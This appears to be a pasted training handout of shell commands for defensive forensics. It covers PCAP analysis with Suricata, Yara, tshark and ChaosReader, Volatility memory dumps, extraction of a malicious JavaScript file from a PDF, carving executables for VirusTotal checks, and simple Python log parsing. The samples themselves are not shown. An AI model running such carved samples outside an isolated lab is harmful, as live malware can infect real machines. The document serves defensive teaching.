  1057. ###############################
  1058. # PCAP Analysis with Suricata #
  1059. # Note: run as root #
  1060. ###############################
  1061. --------------------------Type this as root--------------------------------
  1062. cd ~
  1063.  
  1064. mkdir suricata/
  1065.  
  1066. cd suricata/
  1067.  
  1068. wget http://45.63.104.73/suspicious-time.pcap
  1069.  
  1070. sudo suricata -c /etc/suricata/suricata.yaml -r suspicious-time.pcap -l suri/
  1071.  
  1072. cd suri/
  1073.  
  1074. cat stats.log | less
  1075.  
  1076. cat eve.json |grep -E "e\":\"http"|jq ".timestamp,.http"|csplit - /..T..:/ {*}
  1077.  
  1078. cat xx01
  1079.  
  1080. cat xx02
  1081.  
  1082. cat xx03
  1083.  
  1084. cat xx04
  1085.  
  1086. cat xx05
  1087.  
  1088. cat xx06
  1089. ------------------------------------------------------------------------
  1090.  
  1091.  
  1092. #############################
  1093. # PCAP Analysis with Yara #
  1094. # Note: run as regular user #
  1095. #############################
  1096. -------------------------Type this as a regular user----------------------------------
  1097. cd ~/pcap_analysis/YaraPcap/
  1098.  
  1099.  
  1100. python yaraPcap.py rules-master/index.yar suspicious-time.pcap -s matching_files/
  1101.  
  1102.  
  1103. cd matching_files/
  1104.  
  1105. ls
  1106.  
  1107. cat report.txt
  1108. ------------------------------------------------------------------------
  1109.  
  1110.  
  1111.  
  1112. cd ~/memory_analysis/
  1113. volatility -h
  1114. volatility pslist -f hn_forensics.vmem
  1115. volatility connscan -f hn_forensics.vmem
  1116. volatility -f hn_forensics.vmem memdump -p 888 -D dump/
  1117. volatility -f hn_forensics.vmem memdump -p 1752 -D dump/
  1118. ***Takes a few min***
  1119. cd ~/memory_analysis/dump/
  1120. strings 1752.dmp | grep "^http://" | sort | uniq
  1121. strings 1752.dmp | grep "Ahttps://" | uniq -u
  1122. cd ..
  1123. foremost -i dump/1752.dmp -t pdf -o output/pdf/
  1124. cd ~/memory_analysis/output/pdf/
  1125. cat audit.txt
  1126. cd pdf
  1127. ls
  1128. grep -i javascript *.pdf
  1129.  
  1130.  
  1131.  
  1132. cd ~/memory_analysis/output/pdf/pdf/
  1133. python pdf-parser.py -s javascript --raw 00601560.pdf
  1134. python pdf-parser.py --object 11 00601560.pdf
  1135. python pdf-parser.py --object 1054 --raw --filter 00601560.pdf
  1136. python pdf-parser.py --object 1054 --raw --filter 00601560.pdf > malicious.js
  1137.  
  1138. cat malicious.js
  1139. -----------------------------------------------------------------------
  1140.  
  1141.  
  1142.  
  1143. ##################################
  1144. # Lesson 8: Intro to Log Analysis #
  1145. ##################################
  1146.  
  1147.  
  1148. Log into your Linux host then execute the following commands:
  1149. -----------------------------------------------------------------------
  1150. NOTE: If you are still in your python interpreter then you must type exit() to get back to a regular command-prompt.
  1151.  
  1152.  
  1153.  
  1154. ---------------------------Type This-----------------------------------
  1155. cd ~/students/[yourname]
  1156.  
  1157. wget http://pastebin.com/raw/85zZ5TZX
  1158.  
  1159. mv 85zZ5TZX access_log
  1160.  
  1161.  
  1162. cat access_log | grep 141.101.80.188
  1163.  
  1164. cat access_log | grep 141.101.80.188 | wc -l
  1165.  
  1166. cat access_log | grep 141.101.80.187
  1167.  
  1168. cat access_log | grep 141.101.80.187 | wc -l
  1169.  
  1170. cat access_log | grep 108.162.216.204
  1171.  
  1172. cat access_log | grep 108.162.216.204 | wc -l
  1173.  
  1174. cat access_log | grep 173.245.53.160
  1175.  
  1176. cat access_log | grep 173.245.53.160 | wc -l
  1177.  
  1178. ----------------------------------------------------------------------
  1179.  
  1180.  
  1181.  
  1182.  
  1183.  
  1184.  
  1185.  
  1186. ######################################################
  1187. # Python: Use Python to read in a file line by line #
  1188. ######################################################
  1189.  
  1190.  
  1191. ---------------------------Type This-----------------------------------
  1192.  
  1193. nano logread1.py
  1194.  
  1195.  
  1196. ---------------------------Paste This-----------------------------------
  1197. ## Open the file with read only permit
  1198. f = open('access_log', "r")
  1199.  
  1200. ## use readlines to read all lines in the file
  1201. ## The variable "lines" is a list containing all lines
  1202. lines = f.readlines()
  1203.  
  1204. print (lines)
  1205.  
  1206.  
  1207. ## close the file after reading the lines.
  1208. f.close()
  1209.  
  1210. ----------------------------------------------------------------------
  1211.  
  1212.  
  1213.  
  1214.  
  1215. ---------------------------Type This-----------------------------------
  1216. $ python3 logread1.py
  1217. ----------------------------------------------------------------------
  1218.  
  1219.  
  1220.  
  1221. Google the following:
  1222. - python difference between readlines and readline
  1223. - python readlines and readline
  1224.  
  1225.  
  1226. Here is one student's solution - can you please explain each line of this code to me?
  1227.  
  1228.  
  1229. ---------------------------Type This-----------------------------------
  1230. nano ip_search.py
  1231.  
  1232.  
  1233. ---------------------------Paste This-----------------------------------
  1234. #!/usr/bin/env python3
  1235.  
  1236. f = open('access_log')
  1237.  
  1238. strUsrinput = input("Enter IP Address: ")
  1239.  
  1240. for line in iter(f):
  1241. ip = line.split(" - ")[0]
  1242. if ip == strUsrinput:
  1243. print (line)
  1244.  
  1245. f.close()
  1246.  
  1247.  
  1248. ----------------------------------------------------------------------
  1249.  
  1250.  
  1251.  
  1252.  
  1253. ---------------------------Type This-----------------------------------
  1254. $ python3 ip_search.py
  1255. ----------------------------------------------------------------------
  1256.  
  1257.  
  1258.  
  1259. Working with another student after class we came up with another solution:
  1260.  
  1261. ---------------------------Type This-----------------------------------
  1262. nano ip_search2.py
  1263.  
  1264. ---------------------------Paste This-----------------------------------
  1265. #!/usr/bin/env python3
  1266.  
  1267.  
  1268. # This line opens the log file
  1269. f=open('access_log',"r")
  1270.  
  1271. # This line takes each line in the log file and stores it as an element in the list
  1272. lines = f.readlines()
  1273.  
  1274.  
  1275. # This lines stores the IP that the user types as a var called userinput
  1276. userinput = input("Enter the IP you want to search for: ")
  1277.  
  1278.  
  1279.  
  1280. # This combination for loop and nested if statement looks for the IP in the list called lines and prints the entire line if found.
  1281. for ip in lines:
  1282. if ip.find(userinput) != -1:
  1283. print (ip)
  1284.  
  1285. ----------------------------------------------------------------------
  1286.  
  1287.  
  1288.  
  1289. ---------------------------Type This-----------------------------------
  1290. $ python3 ip_search2.py
  1291. ----------------------------------------------------------------------
  1292.  
  1293.  
  1294.  
  1295.  
  1296. ##################
  1297. # Challenge Labs #
  1298. ##################
  1299. ---------------------------Type this as a regular user----------------------------------
  1300.  
  1301. cd ~/pcap_analysis/prads
  1302.  
  1303. cp /home/ama/mta_challenge/pizzabender.pcap .
  1304.  
  1305. prads -r pizzabender.pcap -l prads-asset.log
  1306.  
  1307. cat prads-asset.log | less
  1308.  
  1309. cat prads-asset.log | grep SYN | grep -iE 'windows|linux'
  1310.  
  1311. cat prads-asset.log | grep CLIENT | grep -iE 'safari|firefox|opera|chrome'
  1312.  
  1313. cat prads-asset.log | grep SERVER | grep -iE 'apache|linux|ubuntu|nginx|iis'
  1314. -----------------------------------------------------------------------
  1315.  
  1316.  
  1317.  
  1318.  
  1319. ##################################
  1320. # PCAP Analysis with ChaosReader #
  1321. # Note: run as regular user #
  1322. ##################################
  1323. ---------------------------Type this as a regular user----------------------------------
  1324.  
  1325. cd ~/pcap_analysis/chaos_reader/
  1326.  
  1327. rm -rf stream* *.html session* image* index* url* *.text
  1328.  
  1329. cp /home/ama/mta_challenge/pizzabender.pcap .
  1330.  
  1331. perl chaosreader.pl pizzabender.pcap
  1332.  
  1333. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
  1334.  
  1335. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
  1336.  
  1337.  
  1338. for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u
  1339.  
  1340.  
  1341.  
  1342. for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u | awk '{print $5}' > url.lst
  1343.  
  1344.  
  1345. python check-urls-virustotal.py url.lst
  1346.  
  1347. ------------------------------------------------------------------------
  1348.  
  1349.  
  1350.  
  1351.  
  1352.  
  1353.  
  1354.  
  1355.  
  1356. #############################
  1357. # PCAP Analysis with tshark #
  1358. # Note: run as regular user #
  1359. #############################
  1360. ---------------------------Type this as a regular user---------------------------------
  1361. cd ~/pcap_analysis/tshark
  1362.  
  1363. cp /home/ama/mta_challenge/pizzabender.pcap .
  1364.  
  1365. tshark -i ens3 -r pizzabender.pcap -qz io,phs
  1366.  
  1367. tshark -r pizzabender.pcap -qz ip_hosts,tree
  1368.  
  1369. tshark -r pizzabender.pcap -Y "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
  1370.  
  1371. tshark -r pizzabender.pcap -Y "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
  1372.  
  1373.  
  1374. tshark -r pizzabender.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
  1375.  
  1376.  
  1377. tshark -r pizzabender.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
  1378.  
  1379. tshark -r pizzabender.pcap -qz http_req,tree
  1380.  
  1381. tshark -r pizzabender.pcap -Y "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
  1382.  
  1383. tshark -r pizzabender.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.8.21.163 | sed -e 's/\?[^cse].*/\?\.\.\./g'
  1384.  
  1385. tshark -r pizzabender.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.8.21.163 | grep -v 239.255.255.250 | sed -e 's/\?[^cse].*/\?\.\.\./g'
  1386. ------------------------------------------------------------------------
  1387.  
  1388.  
  1389. ###############################
  1390. # Extracting files from PCAPs #
  1391. # Note: run as regular user #
  1392. ###############################
  1393. ---------------------------Type this as a regular user---------------------------------
  1394.  
  1395. cd ~/pcap_analysis/extract_files
  1396.  
  1397. cp /home/ama/mta_challenge/pizzabender.pcap .
  1398.  
  1399. rm -rf output
  1400.  
  1401. mkdir output
  1402.  
  1403. foremost -v -i pizzabender.pcap
  1404.  
  1405. cd output
  1406.  
  1407. ls
  1408.  
  1409. cat audit.txt
  1410.  
  1411. cd exe
  1412.  
  1413. cp ~/vtlite.py .
  1414.  
  1415. for f in *.exe; do python3 vtlite.py -s $f; sleep 15; done
  1416. ---------------------------------------------------------------------------------------
  1417.  
  1418. #############################
  1419. # PCAP Analysis with Yara #
  1420. # Note: run as regular user #
  1421. #############################
  1422. -------------------------Type this as a regular user----------------------------------
  1423. cd ~/pcap_analysis/YaraPcap/
  1424.  
  1425. cp /home/ama/mta_challenge/pizzabender.pcap .
  1426.  
  1427.  
  1428. python yaraPcap.py rules-master/index.yar pizzabender.pcap -s mta_matching_files/
  1429.  
  1430.  
  1431. cd mta_matching_files/
  1432.  
  1433. ls
  1434.  
  1435. cat report.txt
  1436. ------------------------------------------------------------------------
Add Comment
Please, Sign In to add comment